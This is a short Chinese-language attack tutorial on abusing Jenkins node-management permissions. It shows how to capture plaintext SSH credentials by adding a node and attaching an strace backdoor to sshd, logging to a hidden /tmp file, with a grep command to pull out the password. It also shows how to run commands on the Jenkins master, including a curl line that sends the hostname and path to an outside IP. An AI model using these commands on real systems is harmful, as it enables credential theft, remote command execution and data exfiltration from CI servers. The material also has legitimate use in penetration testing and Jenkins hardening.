拥有Jenkins agent权限的账号可以对node节点进行操作，通过添加不同的node可以让流水线项目在不同的节点上运行，安装Jenkins的主机默认作为master节点。

1.Jenkins 添加node获取明文凭据

通过添加node节点，本地监听ssh认证，选则凭据（明文）进行ssh认证，拿到密码。

1.新建节点-manage nodes功能

2.填写工作目录，选择通过SSH进行远程节点身份认证，选择抓取带*号的凭据，host key选择不进行验证：

3.主机监听：这里监听主机ssh使用的是strace后门，实际也可以使用其他方式进行：

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)

4.保存节点配置， Jenkins将对主机进行ssh请求：

node节点认证日志（账号密码方式）：

5. 查看接受结果，这种方式获得的密码需要自行判断下起始位置

grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log

2.通过添加节点执行命令

同样的，在添加节点时可以配置在master上执行命令去进行其他节点认证，也就可以在master上执行恶意命令了。

注意：这里执行curl命令时不能使用``直接执行系统命令，所以利用时需要更换其他方式。

curl -k ip:9090/`hostname`/`pwd`
env

添加节点时也可以从控制器执行命令，Launch method 选择 通过在master上执行命令的方式：

保存然后launch agent：

可以在Log里面看到命令env的输出：